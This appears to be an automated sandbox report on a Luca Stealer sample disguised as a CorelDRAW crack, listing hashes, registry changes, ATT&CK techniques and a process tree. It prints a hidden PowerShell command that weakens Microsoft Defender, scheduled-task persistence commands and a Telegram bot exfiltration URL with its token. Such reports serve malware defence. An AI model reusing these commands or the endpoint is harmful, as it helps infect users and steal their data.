lucastealer | bae657952c18da180d9c8191dcd6155c5302c88d9ec9b1c4b9598e3b8bd1c521

Analysis

max time kernel
40s
max time network
38s
platform
windows10-2004_x64
resource
win10v2004-20230915-es
resource tags

arch:x64arch:x86image:win10v2004-20230915-eslocale:es-esos:windows10-2004-x64systemwindows
submitted
04-10-2023 22:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CorelDRAW.Patch.2023.v24.exe
Size

4.4MB
MD5

bbb5d77f47e25b458cc257a7599cbde9
SHA1

8086af2d89ab76180f1122f367eed7889357c6ec
SHA256

bae657952c18da180d9c8191dcd6155c5302c88d9ec9b1c4b9598e3b8bd1c521
SHA512

a4f67cad42216cd0fdc52e2147bf2e18e0f64010ffc174ff31cc736b0e44ac9219aecc00b33b036e2ea8e8a666230ea6c96704ee549253133dd73d81efbed0ba
SSDEEP

98304:ltrbTA1zvAC4rXLW6jRhdGVQguhhW31Z7:3c1zO7L5LdGVzu+lV

Score

10^/10

lucastealer evasion persistence stealer

Malware Config

Extracted

Family

lucastealer

https://api.telegram.org/bot6068798932:AAG_cHiqinDwNZ3Hd-rdp8tPwbT0czdVwTw

Signatures

Luca Stealer
Info stealer written in Rust first seen in July 2022.
stealer lucastealer

Modifies WinLogon for persistence 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

explorer.exesvchost.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "C:\\Windows\\explorer.exe, c:\\windows\\system\\explorer.exe"	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "C:\\Windows\\explorer.exe, c:\\windows\\system\\explorer.exe"	svchost.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Processes:

svchost.exeexplorer.exe

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	explorer.exe

Modifies Installed Components in the registry 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

explorer.exesvchost.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666}	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\mrsys.exe MR"	explorer.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999}	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\mrsys.exe MR"	svchost.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666}	svchost.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

CorelDRAW.Patch.2023.v24.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation	CorelDRAW.Patch.2023.v24.exe

Drops startup file 1 IoCs

Processes:

CorelDRAW.Patch.2023.v24.exe

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GYLWLR.lnk	CorelDRAW.Patch.2023.v24.exe

Executes dropped EXE 7 IoCs

Processes:

YDMNQC.exeydmnqc.exe icsys.icn.exeexplorer.exespoolsv.exesvchost.exespoolsv.exe

pid	Process
1328	YDMNQC.exe
3968	ydmnqc.exe
2560	icsys.icn.exe
2912	explorer.exe
3044	spoolsv.exe
2384	svchost.exe
4872	spoolsv.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

CorelDRAW.Patch.2023.v24.exeexplorer.exesvchost.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GYLWLR = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windata\\Microsoft Office Click-to-Run.exe\""	CorelDRAW.Patch.2023.v24.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\system\\explorer.exe RO"	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\system\\svchost.exe RO"	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\system\\explorer.exe RO"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\system\\svchost.exe RO"	svchost.exe

Drops file in Windows directory 5 IoCs

Processes:

spoolsv.exeexplorer.exesvchost.exeicsys.icn.exe

description	ioc	Process
File opened for modification	\??\c:\windows\system\svchost.exe	spoolsv.exe
File opened for modification	\??\c:\windows\system\explorer.exe	explorer.exe
File opened for modification	\??\c:\windows\system\svchost.exe	svchost.exe
File opened for modification	\??\c:\windows\system\explorer.exe	icsys.icn.exe
File opened for modification	\??\c:\windows\system\spoolsv.exe	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exe

pid	Process
3760	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

CorelDRAW.Patch.2023.v24.exepowershell.exeicsys.icn.exeexplorer.exesvchost.exe

pid	Process
4320	CorelDRAW.Patch.2023.v24.exe
4320	CorelDRAW.Patch.2023.v24.exe
4092	powershell.exe
2560	icsys.icn.exe
2560	icsys.icn.exe
4092	powershell.exe
2912	explorer.exe
2912	explorer.exe
2912	explorer.exe
2912	explorer.exe
2912	explorer.exe
2912	explorer.exe
2912	explorer.exe
2912	explorer.exe
2912	explorer.exe
2912	explorer.exe
2912	explorer.exe
2912	explorer.exe
2912	explorer.exe
2912	explorer.exe
2384	svchost.exe
2384	svchost.exe
2384	svchost.exe
2384	svchost.exe
2912	explorer.exe
2912	explorer.exe
2384	svchost.exe
2384	svchost.exe
2912	explorer.exe
2912	explorer.exe
2384	svchost.exe
2384	svchost.exe
2912	explorer.exe
2912	explorer.exe
2384	svchost.exe
2384	svchost.exe
2912	explorer.exe
2912	explorer.exe
2384	svchost.exe
2912	explorer.exe
2912	explorer.exe
2384	svchost.exe
2912	explorer.exe
2384	svchost.exe
2912	explorer.exe
2384	svchost.exe
2384	svchost.exe
2912	explorer.exe
2912	explorer.exe
2384	svchost.exe
2912	explorer.exe
2384	svchost.exe
2912	explorer.exe
2384	svchost.exe
2384	svchost.exe
2912	explorer.exe
2384	svchost.exe
2912	explorer.exe
2912	explorer.exe
2912	explorer.exe
2384	svchost.exe
2384	svchost.exe
2384	svchost.exe
2912	explorer.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

Processes:

CorelDRAW.Patch.2023.v24.exeexplorer.exesvchost.exe

pid	Process
4320	CorelDRAW.Patch.2023.v24.exe
2912	explorer.exe
2384	svchost.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description	pid	Process
Token: SeDebugPrivilege	4092	powershell.exe

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

YDMNQC.exeicsys.icn.exeexplorer.exespoolsv.exesvchost.exespoolsv.exe

pid	Process
1328	YDMNQC.exe
1328	YDMNQC.exe
2560	icsys.icn.exe
2560	icsys.icn.exe
2912	explorer.exe
2912	explorer.exe
3044	spoolsv.exe
3044	spoolsv.exe
2384	svchost.exe
2384	svchost.exe
4872	spoolsv.exe
4872	spoolsv.exe
2912	explorer.exe
2912	explorer.exe

Suspicious use of WriteProcessMemory 41 IoCs

Processes:

CorelDRAW.Patch.2023.v24.execmd.execmd.exeYDMNQC.exeicsys.icn.exeexplorer.exespoolsv.exesvchost.exe

description	pid	Process	procid_target
PID 4320 wrote to memory of 1328	4320	CorelDRAW.Patch.2023.v24.exe	85
PID 4320 wrote to memory of 1328	4320	CorelDRAW.Patch.2023.v24.exe	85
PID 4320 wrote to memory of 1328	4320	CorelDRAW.Patch.2023.v24.exe	85
PID 4320 wrote to memory of 4376	4320	CorelDRAW.Patch.2023.v24.exe	87
PID 4320 wrote to memory of 4376	4320	CorelDRAW.Patch.2023.v24.exe	87
PID 4320 wrote to memory of 4376	4320	CorelDRAW.Patch.2023.v24.exe	87
PID 4376 wrote to memory of 2548	4376	cmd.exe	90
PID 4376 wrote to memory of 2548	4376	cmd.exe	90
PID 4376 wrote to memory of 2548	4376	cmd.exe	90
PID 4320 wrote to memory of 2624	4320	CorelDRAW.Patch.2023.v24.exe	91
PID 4320 wrote to memory of 2624	4320	CorelDRAW.Patch.2023.v24.exe	91
PID 4320 wrote to memory of 2624	4320	CorelDRAW.Patch.2023.v24.exe	91
PID 4376 wrote to memory of 4092	4376	cmd.exe	93
PID 4376 wrote to memory of 4092	4376	cmd.exe	93
PID 4376 wrote to memory of 4092	4376	cmd.exe	93
PID 2624 wrote to memory of 3760	2624	cmd.exe	94
PID 2624 wrote to memory of 3760	2624	cmd.exe	94
PID 2624 wrote to memory of 3760	2624	cmd.exe	94
PID 4376 wrote to memory of 5056	4376	cmd.exe	96
PID 4376 wrote to memory of 5056	4376	cmd.exe	96
PID 4376 wrote to memory of 5056	4376	cmd.exe	96
PID 1328 wrote to memory of 3968	1328	YDMNQC.exe	97
PID 1328 wrote to memory of 3968	1328	YDMNQC.exe	97
PID 1328 wrote to memory of 2560	1328	YDMNQC.exe	101
PID 1328 wrote to memory of 2560	1328	YDMNQC.exe	101
PID 1328 wrote to memory of 2560	1328	YDMNQC.exe	101
PID 2560 wrote to memory of 2912	2560	icsys.icn.exe	102
PID 2560 wrote to memory of 2912	2560	icsys.icn.exe	102
PID 2560 wrote to memory of 2912	2560	icsys.icn.exe	102
PID 2912 wrote to memory of 3044	2912	explorer.exe	103
PID 2912 wrote to memory of 3044	2912	explorer.exe	103
PID 2912 wrote to memory of 3044	2912	explorer.exe	103
PID 3044 wrote to memory of 2384	3044	spoolsv.exe	104
PID 3044 wrote to memory of 2384	3044	spoolsv.exe	104
PID 3044 wrote to memory of 2384	3044	spoolsv.exe	104
PID 2384 wrote to memory of 4872	2384	svchost.exe	106
PID 2384 wrote to memory of 4872	2384	svchost.exe	106
PID 2384 wrote to memory of 4872	2384	svchost.exe	106
PID 2384 wrote to memory of 3736	2384	svchost.exe	108
PID 2384 wrote to memory of 3736	2384	svchost.exe	108
PID 2384 wrote to memory of 3736	2384	svchost.exe	108

C:\Users\Admin\AppData\Local\Temp\CorelDRAW.Patch.2023.v24.exe
"C:\Users\Admin\AppData\Local\Temp\CorelDRAW.Patch.2023.v24.exe"
1⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:4320
- C:\Users\Admin\AppData\Local\Temp\YDMNQC.exe
  "C:\Users\Admin\AppData\Local\Temp\YDMNQC.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1328
- - \??\c:\users\admin\appdata\local\temp\ydmnqc.exe
    c:\users\admin\appdata\local\temp\ydmnqc.exe
    3⤵
    - Executes dropped EXE
    PID:3968
- - C:\Users\Admin\AppData\Local\icsys.icn.exe
    C:\Users\Admin\AppData\Local\icsys.icn.exe
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2560
  - - \??\c:\windows\system\explorer.exe
      c:\windows\system\explorer.exe
      4⤵
      Modifies WinLogon for persistence
      Modifies visiblity of hidden/system files in Explorer
      Modifies Installed Components in the registry
      Executes dropped EXE
      Adds Run key to start application
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2912
    - - \??\c:\windows\system\spoolsv.exe
        
        c:\windows\system\spoolsv.exe SE
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3044
      - \??\c:\windows\system\svchost.exe
        
        c:\windows\system\svchost.exe
        6⤵
        Modifies WinLogon for persistence
        Modifies visiblity of hidden/system files in Explorer
        Modifies Installed Components in the registry
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2384
        
        \??\c:\windows\system\spoolsv.exe
        
        c:\windows\system\spoolsv.exe PR
        7⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4872
        
        C:\Windows\SysWOW64\at.exe
        
        at 22:41 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
        7⤵
        
        PID:3736
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IWTLYM.cmd" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4376
- - C:\Windows\SysWOW64\reg.exe
    reg query "HKU\S-1-5-19\Environment"
    3⤵
    PID:2548
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -nologo -noninteractive -windowStyle hidden -noprofile -command $First = "Add-MpPreference -ThreatIDDefaultAction_Ids "; $Third = " -ThreatIDDefaultAction_Actions Allow -Force"; $ListID = 2147685180, 2147735507, 2147736914, 2147743522, 2147734094, 2147743421, 251873, 213927, 2147722906, 2147748160; ForEach ($ID in $ListID) { Invoke-Expression ($First + $ID + $Third) }; $ListPath = "C:\Windows\KMSAutoS", "C:\Windows\System32\SppExtComObjHook.dll", "C:\Windows\System32\SppExtComObjPatcher.exe", "C:\Windows\AAct_Tools", "C:\Windows\AAct_Tools\AAct_x64.exe", "C:\Windows\AAct_Tools\AAct_files\KMSSS.exe", "C:\Windows\AAct_Tools\AAct_files", "C:\Windows\KMS"; $First = "Add-MpPreference -ExclusionPath "; $Third = "-Force"; ForEach ($Path in $ListPath) { Invoke-Expression ($First + $Path + $Third) }; :Admin
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4092
- - C:\Windows\SysWOW64\reg.exe
    reg query "HKU\S-1-5-19\Environment"
    3⤵
    PID:5056
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn GYLWLR.exe /tr C:\Users\Admin\AppData\Roaming\Windata\Microsoft Office Click-to-Run.exe /sc minute /mo 1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2624
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn GYLWLR.exe /tr C:\Users\Admin\AppData\Roaming\Windata\Microsoft Office Click-to-Run.exe /sc minute /mo 1
    3⤵
    - Creates scheduled task(s)
    PID:3760

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\IWTLYM.cmd

Filesize
1KB

MD5
15a1fe3d0f342bdd3232253c7810a05d

SHA1
b658e0d903b37bf12e8e640bece22f235552dc50

SHA256
4070dcb09b69ef57160fae0be5ee3664e39170eeacc46e6f50a080493552b338

SHA512
1961fc65a839c55806162a197385859cfe3a24551ab9b7e0121166eac5e5ae1a4a0d9180229d0ea0240dccb770e4c2d508577e60988c9271bb11f94de1897a35

Download Submit
C:\Users\Admin\AppData\Local\Temp\YDMNQC.exe

Filesize
5.9MB

MD5
021079dc0918b9c7359e93e770678000

SHA1
70c03da6f7b339340b1943f5d0b7b1fd87579adf

SHA256
ee63e26e84d8092fda9e527f7db34777b6261d8dfc96ed42167383f88cf1c487

SHA512
9bc14753e39f2c93737886439d64a458f08265d1d8176c233a8e3f864e1f4f2751b161aa22408618d0dd343fb88b7037c8c2eee898c6d9b3bf466aaea709c5b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\YDMNQC.exe

Filesize
5.9MB

MD5
021079dc0918b9c7359e93e770678000

SHA1
70c03da6f7b339340b1943f5d0b7b1fd87579adf

SHA256
ee63e26e84d8092fda9e527f7db34777b6261d8dfc96ed42167383f88cf1c487

SHA512
9bc14753e39f2c93737886439d64a458f08265d1d8176c233a8e3f864e1f4f2751b161aa22408618d0dd343fb88b7037c8c2eee898c6d9b3bf466aaea709c5b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\YDMNQC.exe

Filesize
5.9MB

MD5
021079dc0918b9c7359e93e770678000

SHA1
70c03da6f7b339340b1943f5d0b7b1fd87579adf

SHA256
ee63e26e84d8092fda9e527f7db34777b6261d8dfc96ed42167383f88cf1c487

SHA512
9bc14753e39f2c93737886439d64a458f08265d1d8176c233a8e3f864e1f4f2751b161aa22408618d0dd343fb88b7037c8c2eee898c6d9b3bf466aaea709c5b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5yn54ryb.ap3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ydmnqc.exe

Filesize
5.7MB

MD5
2c2055233260e5bb20ce675afd39ed0d

SHA1
26c056ba8e99a3fb523612b422a85be3ecbbd5b3

SHA256
306827f0ef0a4cbecd5458776244bf7ee99f2e49569daf0034176b39f5d1c17d

SHA512
3e2a18cd0c7fe5e3529d37ac37b352f8c19d3fef947f117701bb712c19cb40ff3ed56c843c789334a6c93382deef1f5cf4a48fbadb6b1e46fe804b9430fa1546

Download Submit
C:\Users\Admin\AppData\Local\icsys.icn.exe

Filesize
206KB

MD5
c5f78d788265a8c2b80017a0dc351266

SHA1
32836c3ccaf84431beaba1b10107743c052cddc0

SHA256
0a48908b44578715b511d6c067b2b0c1351783c049c68183f6067afff1ff72d0

SHA512
0315d122adf425001109bae742a1aff418f301f46c3655bf3e3d0c12ecc03ac3d70b52a60a744f81b7b041d28bf235f3d93abc26c71bfdd388be6a145a1bbb16

Download Submit
C:\Users\Admin\AppData\Local\icsys.icn.exe

Filesize
206KB

MD5
c5f78d788265a8c2b80017a0dc351266

SHA1
32836c3ccaf84431beaba1b10107743c052cddc0

SHA256
0a48908b44578715b511d6c067b2b0c1351783c049c68183f6067afff1ff72d0

SHA512
0315d122adf425001109bae742a1aff418f301f46c3655bf3e3d0c12ecc03ac3d70b52a60a744f81b7b041d28bf235f3d93abc26c71bfdd388be6a145a1bbb16

Download Submit
C:\Users\Admin\AppData\Roaming\mrsys.exe

Filesize
206KB

MD5
0015c03456296e1dc33413c1806ae6f9

SHA1
9ef0ccbbafbe9b73c037f98555ba6f8126b4309d

SHA256
99288e6a286f2096f429b1ff4e5f2d66bb448e4a7160cb2d4c33648cfa718665

SHA512
ea8bdd3cfc47bbc15a155db3498bd350b2fe521bfd3e0aced1aa18561cdd9fb94fd0db89931f5e6bd2684c5dda7c4a6a7c7fe09a16a6d0f6de5639f3e2b170c9

Download Submit
C:\Windows\System\explorer.exe

Filesize
206KB

MD5
30845495f4b1a36e7cd5c30312f37321

SHA1
ab01af935f2353baac746104938c1cc1f49217c4

SHA256
8d00cf891a846d4456c23030ac1379c48d5f84a63ef158a28ed29226fda8aacf

SHA512
d5a82e4bf46f036ec31447e53756d1c88da332d91faaee900427eed3c74026bdde58cfe78666c423b43335b78cee1c9715705e4d5ee9561bbff8ce97fc216560

Download Submit
C:\Windows\System\spoolsv.exe

Filesize
206KB

MD5
a250ef7201eb68790d4a3c0422dd7c02

SHA1
97a6dfc7253a3cec8e134f1ddba25e46027e67cb

SHA256
94e315e13262077bf58d3fd44ede9837582ed1045ddad9be833cce8adfd6e2a4

SHA512
75e6b760513fdb3574d03a070df647d3bf588f079159d48349fafe3354f24a831a9dd48f80093b76eab41a529470726b39cc2e982a8e0fbee1f7fd3f6baa7610

Download Submit
C:\Windows\System\spoolsv.exe

Filesize
206KB

MD5
a250ef7201eb68790d4a3c0422dd7c02

SHA1
97a6dfc7253a3cec8e134f1ddba25e46027e67cb

SHA256
94e315e13262077bf58d3fd44ede9837582ed1045ddad9be833cce8adfd6e2a4

SHA512
75e6b760513fdb3574d03a070df647d3bf588f079159d48349fafe3354f24a831a9dd48f80093b76eab41a529470726b39cc2e982a8e0fbee1f7fd3f6baa7610

Download Submit
C:\Windows\System\svchost.exe

Filesize
207KB

MD5
b80105986cd7ff97e6105f53e146879c

SHA1
061f045a934502becac2f496b6c227af114ab138

SHA256
bdada984d32a7190d6d148eb47ecc7a541752607f3d97e7b339ef4e4cf1a2059

SHA512
5f4c30b4a3c348a5a4e311f7585f41160729e95389a3c2c444753974e990ef6f23553c994aa762c49df28666715cec2b2c5fa89cdb4b4b004b15e2d07a817024

Download Submit
\??\c:\users\admin\appdata\local\temp\ydmnqc.exe

Filesize
5.7MB

MD5
2c2055233260e5bb20ce675afd39ed0d

SHA1
26c056ba8e99a3fb523612b422a85be3ecbbd5b3

SHA256
306827f0ef0a4cbecd5458776244bf7ee99f2e49569daf0034176b39f5d1c17d

SHA512
3e2a18cd0c7fe5e3529d37ac37b352f8c19d3fef947f117701bb712c19cb40ff3ed56c843c789334a6c93382deef1f5cf4a48fbadb6b1e46fe804b9430fa1546

Download Submit
\??\c:\windows\system\explorer.exe

Filesize
206KB

MD5
30845495f4b1a36e7cd5c30312f37321

SHA1
ab01af935f2353baac746104938c1cc1f49217c4

SHA256
8d00cf891a846d4456c23030ac1379c48d5f84a63ef158a28ed29226fda8aacf

SHA512
d5a82e4bf46f036ec31447e53756d1c88da332d91faaee900427eed3c74026bdde58cfe78666c423b43335b78cee1c9715705e4d5ee9561bbff8ce97fc216560

Download Submit
\??\c:\windows\system\spoolsv.exe

Filesize
206KB

MD5
a250ef7201eb68790d4a3c0422dd7c02

SHA1
97a6dfc7253a3cec8e134f1ddba25e46027e67cb

SHA256
94e315e13262077bf58d3fd44ede9837582ed1045ddad9be833cce8adfd6e2a4

SHA512
75e6b760513fdb3574d03a070df647d3bf588f079159d48349fafe3354f24a831a9dd48f80093b76eab41a529470726b39cc2e982a8e0fbee1f7fd3f6baa7610

Download Submit
\??\c:\windows\system\svchost.exe

Filesize
207KB

MD5
b80105986cd7ff97e6105f53e146879c

SHA1
061f045a934502becac2f496b6c227af114ab138

SHA256
bdada984d32a7190d6d148eb47ecc7a541752607f3d97e7b339ef4e4cf1a2059

SHA512
5f4c30b4a3c348a5a4e311f7585f41160729e95389a3c2c444753974e990ef6f23553c994aa762c49df28666715cec2b2c5fa89cdb4b4b004b15e2d07a817024

Download Submit
memory/1328-100-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/1328-19-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2560-101-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2912-60-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/3044-99-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/4092-36-0x00000000731C0000-0x0000000073970000-memory.dmp

Filesize
7.7MB

Download
memory/4092-40-0x0000000005B00000-0x0000000006128000-memory.dmp

Filesize
6.2MB

Download
memory/4092-61-0x0000000006340000-0x00000000063A6000-memory.dmp

Filesize
408KB

Download
memory/4092-75-0x00000000062D0000-0x00000000062E0000-memory.dmp

Filesize
64KB

Download
memory/4092-52-0x0000000006260000-0x00000000062C6000-memory.dmp

Filesize
408KB

Download
memory/4092-48-0x0000000005980000-0x00000000059A2000-memory.dmp

Filesize
136KB

Download
memory/4092-83-0x00000000069C0000-0x0000000006AC2000-memory.dmp

Filesize
1.0MB

Download
memory/4092-44-0x00000000058F0000-0x0000000005972000-memory.dmp

Filesize
520KB

Download
memory/4092-91-0x00000000731C0000-0x0000000073970000-memory.dmp

Filesize
7.7MB

Download
memory/4092-107-0x00000000731C0000-0x0000000073970000-memory.dmp

Filesize
7.7MB

Download
memory/4092-93-0x0000000006970000-0x000000000698E000-memory.dmp

Filesize
120KB

Download
memory/4092-95-0x0000000006B20000-0x0000000006B6C000-memory.dmp

Filesize
304KB

Download
memory/4092-104-0x00000000054C0000-0x00000000054D0000-memory.dmp

Filesize
64KB

Download
memory/4092-71-0x0000000006550000-0x00000000068A4000-memory.dmp

Filesize
3.3MB

Download
memory/4092-39-0x00000000054C0000-0x00000000054D0000-memory.dmp

Filesize
64KB

Download
memory/4092-37-0x00000000032F0000-0x0000000003326000-memory.dmp

Filesize
216KB

Download
memory/4092-38-0x00000000054C0000-0x00000000054D0000-memory.dmp

Filesize
64KB

Download
memory/4092-103-0x00000000054C0000-0x00000000054D0000-memory.dmp

Filesize
64KB

Download
memory/4872-96-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/4872-92-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download